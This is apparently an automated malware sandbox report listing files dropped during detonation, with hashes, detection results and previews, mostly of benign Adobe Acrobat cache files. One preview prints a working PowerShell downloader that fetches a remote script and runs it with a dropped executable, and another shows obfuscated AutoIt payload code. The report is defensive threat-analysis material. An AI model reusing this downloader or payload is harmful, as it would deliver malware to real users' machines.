                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              FREE-NET-ASFREEnetEUjqplot.htaGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.112.248
                                                                                              KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x47eed223, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1048576
                                                                                                                  Entropy (8bit):0.9433513948950576
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
                                                                                                                  MD5:7B8D153B8B5E9F93470E17FBB5D1A55F
                                                                                                                  SHA1:851FFDEB62EEF172E5EC9E6B0906EB1D95D8571A
                                                                                                                  SHA-256:ECE9E094CEC3BA838B9DDFE5948249278F3E291EA2252F88BFFD4948AB00DEC8
                                                                                                                  SHA-512:94E71FC4CD2C09297C3486A417F7185B18F2683CF017B36B6BFD2ECDB44BAE3A7CF742E7A90FBFE0C4F93B82688AAA3B98D1223BDE340FCFBD74F6567390BBB9
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                                                  • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                                                  • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                                                  Process:C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):491
                                                                                                                  Entropy (8bit):5.191609448349446
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:fZUoHFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:feoHCknZ9LzjYnRSb8Cba
                                                                                                                  MD5:AB05FCD936A94B5F59C5FA9A33508DC5
                                                                                                                  SHA1:5E93159500F769E453FC2CDC21EC7A80D013EAF0
                                                                                                                  SHA-256:5160D42832ED640E20C94FAF1127797448110EC6F848E4D383CC694EA74D429E
                                                                                                                  SHA-512:BBDE57DB63D4F857AD78C181237B29F13A661D2BC00F477BCAE5686467784940353B3E2F3EAF9CDD6E5ABF50CFA1EDE2D6756D67742B440BF4F673B268943DCB
                                                                                                                  Malicious:true
                                                                                                                  Preview:[string]$fU5L = "https://tiffany-careers.com/jzuVDmQ.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1150519
                                                                                                                  Entropy (8bit):5.198639503905394
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:28V+jcfSplhi959S1mg+PL9KBZ9kt41MgsUWiOl08zHBhk/d:qcElo59TZAZ9ssWDphk1
                                                                                                                  MD5:DDD5ABB63224FAE3D89C5A90F0AA7874
                                                                                                                  SHA1:F2B56F63C4505F1BEFAC603DB51B18473B7A16A9
                                                                                                                  SHA-256:99A728108CF4148666B76881247BFD8DC1D666A0E3EC80C5CFA81610B995A194
                                                                                                                  SHA-512:DF443771AA472AC2CE6D674F190CE1A79D38ACE2BAF5B9AD620042F708C12729B70B742B12003B9C9EDFB442B62EB948F10D74543EB1AE6571896F51152FE0F9
                                                                                                                  Malicious:true
                                                                                                                  Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):475
                                                                                                                  Entropy (8bit):4.963247713778661
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                                                  MD5:D46529E824E6E834D0D750C5560C136C
                                                                                                                  SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                                                  SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                                                  SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):475
                                                                                                                  Entropy (8bit):4.963247713778661
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                                                  MD5:D46529E824E6E834D0D750C5560C136C
                                                                                                                  SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                                                  SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                                                  SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65110
                                                                                                                  Entropy (8bit):4.0960479354974
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:u0eDil7wkRKfCqzmbeE/kh1B1Qn/0CjVQe0yZHvxUli:GA7wyCNSiE/kh1Bc/0Cj4yZJ7
                                                                                                                  MD5:AD103A90F30942B861F8499BF5C68CB9
                                                                                                                  SHA1:4C70481637E46F4E61CDBF46E8ACB05FB31AB263
                                                                                                                  SHA-256:F4DE33405E2771BA2C8FD2E0378453815CE0F3732CC624C5D163060616172389
                                                                                                                  SHA-512:0E14321DB45729D7D11D6DB505C75F50B71CE6036A91C3E18DD988CD1A43CA90DDC592F739C1170F1BA4521AE2702A1144912B77E805B9220F77EB196C05326B
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Certificate, Version=3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1391
                                                                                                                  Entropy (8bit):7.705940075877404
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):71954
                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):192
                                                                                                                  Entropy (8bit):2.7457468364538267
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:kkFkleNXfllXlE/HT8k3lJtNNX8RolJuRdxLlGB9lQRYwpDdt:kKHOT8aRNMa8RdWBwRd
                                                                                                                  MD5:42BD476D84108A1A2038EC07CC0B2A8E
                                                                                                                  SHA1:DFF2F911BA32E9998DE3293D0E425FAE35DF1CB8
                                                                                                                  SHA-256:5F5727E9A975AAD8D5A0BFC875172B3E60DEC6B2B2715DDF93BBD7D076A46D2D
                                                                                                                  SHA-512:63CE8813BE547A68FABC5C09B5B47CA0569DB72E84DCD20C3626798BCF7695F87E75EFD2095846C07E6F0D04C3ED3D3A6D2AB089BA20AEACA4D74895CE08EBB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ........m....U..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):328
                                                                                                                  Entropy (8bit):3.117522441811026
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKEB9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1DnLNkPlE99SNxAhUe/3
                                                                                                                  MD5:16E1AAA267B262C49D70E2C089079B72
                                                                                                                  SHA1:4B7B17AD2FDBE9043BB90D721B06D181BB6E7443
                                                                                                                  SHA-256:0429EEAEB893DC0F02CD3A59B5CA07188820DF0118CB4E162F67C0FB52B14357
                                                                                                                  SHA-512:8B82CC3C1DEF51CD405BEC149462A5BC7DA768082A62F0F94DD1000851B276F9E3D63F4F601ADB3CC33F964D16FB4EF235D3A98FAF0D769904175022BFBF0345
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... .........l.".U..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.3413180255546076
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJM3g98kUwPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGMbLUkee9
                                                                                                                  MD5:E3008F6573FA569F0F5A6431B90D23FE
                                                                                                                  SHA1:9E60978FDB63B1A8EE033F5479045A64FDFBE020
                                                                                                                  SHA-256:C74F64E0F709FD0AB10133F507CA124F5809F4D6DD58B5FAB38D46D87BBA16E2
                                                                                                                  SHA-512:1301D88B8635C004E17BA4AC278EC13FF827418655BFA6F23FE6ECC786989D6501908D7717841A969526EC59A5BE6BBB4F057E2833547AF850B1BD133E5333FF
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.274159630236761
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfBoTfXpnrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGWTfXcUkee9
                                                                                                                  MD5:4BA615D771432FCC7638D14D9B69DE5F
                                                                                                                  SHA1:D341A4146584C21C798B5ADED63D6EDDADEB47FC
                                                                                                                  SHA-256:0C94C44C39D72C65E212F145BA8D2958C0F93E298ED2FB002DEEA539F5C19C80
                                                                                                                  SHA-512:0C558EE03C91026484D096D53E6DCABB262D2FCCA8D98DDCD8F60D3D29F5100F36C7D8A923DD33659AAF25A00D89057AD4C150D207F67C02E923FAC6A9077478
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.253154665631836
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfBD2G6UpnrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGR22cUkee9
                                                                                                                  MD5:6D6F0A21281F25F5ADACAA27451EC313
                                                                                                                  SHA1:FBEA7CEB22E6901D694D2292B45608C5251B398B
                                                                                                                  SHA-256:5A862CDBBAE6DF5E8F49E7E386D11F4151F0EBDD01C2BC6603776F503E839934
                                                                                                                  SHA-512:5269C57369863B56B7AC8C3586C9EBD9CBA167C373CAAA93AFFA4EB69AAE7ACAF32801F87DDF7383E7A7BA2599F8C5845B175C54FBD88F86FBE5D6D08477CECC
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):285
                                                                                                                  Entropy (8bit):5.317493050669637
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfPmwrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGH56Ukee9
                                                                                                                  MD5:F7416BFA5FF61E7BB0A8C476BA0FBF8A
                                                                                                                  SHA1:3184C2B969ACE4B127E769920E375A81831A400C
                                                                                                                  SHA-256:2D7850130D4DEE3AEF40DE0CDB6D1BBC96B3B29F37D33BAB0326E7EF284EF81A
                                                                                                                  SHA-512:033CACD157CCA9CF871B9A1CF6F8002EC121D8DA8352E84CA1890951FDED27A4D418C734C23D703A7DC12C439040A16540CA41026FE21EDDD82F87BE9B37B54D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1123
                                                                                                                  Entropy (8bit):5.686521695390952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6X+obV2JhipLgE9cQx8LennAvzBvkn0RCmK8czOCCS4:YvgbYJhihgy6SAFv5Ah8cv/4
                                                                                                                  MD5:6C8F5C8CB30EBEECE5B9637FD7E43A83
                                                                                                                  SHA1:4387986A08CD46F0660DCE579BFADFF04BA1DC39
                                                                                                                  SHA-256:6B14C61B2B3BCD00EC26DAD0EC013AA119E0D3D5F25ED93D4AD9F65EF96AC60B
                                                                                                                  SHA-512:2D2DB77C8BAE87DEE3C3A001F22DAD7B45CE0EC6069E29D0CE7E7D9E539D4E1E44912B1835E2C7616B205DD1669F968766BFC9A3B8B0DCFE0C1F357D885D2F76
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.263928691944252
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf8dPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGU8Ukee9
                                                                                                                  MD5:7889EE9748E9549A76A53DAA9081D816
                                                                                                                  SHA1:F8CFC36399F93E33FDBEC4F9FC74C8CED4ADD20D
                                                                                                                  SHA-256:D8F9D0FDDAEDB56750119EE276FC31894D9B38920FC02162A8DEB25F6567B7B6
                                                                                                                  SHA-512:AC5B06CDAF312343085D77D270FF7CE46E28018B3388180FFBD56F8E2CAC16B837C6C118892D4B436F147479BAE17663E8E172E74BD08EBB83D4A4FBD1B7662D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):292
                                                                                                                  Entropy (8bit):5.2635130408932245
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfQ1rPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGY16Ukee9
                                                                                                                  MD5:AEFD290BCD6C67CC717264954594002C
                                                                                                                  SHA1:1BEFC91D94C04821CEB7D24F38D48EDDD1BEFEA9
                                                                                                                  SHA-256:1F3CD4429083CDC385361B7C180AE96377B003B3BF25B32AB9951696104156B6
                                                                                                                  SHA-512:585C33242D499D2AE95924DFA74468351150ABCB898FE985B770B90BE6541AC27157C8A6C0F328E5392EC3381C5DC5E2CE5A940B7FD235B7DF81741A60DEFD3B
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.277896230546657
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfFldPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGz8Ukee9
                                                                                                                  MD5:CD075AA2FC3B72B68D7AB1C30B14F103
                                                                                                                  SHA1:3D8587F82E7A7F7EB93B3E55C6B63D7BA656FB77
                                                                                                                  SHA-256:BAB685392DB5BCA096A292CA759562246ECD54D603FF3047C58EC1623EEEE1EA
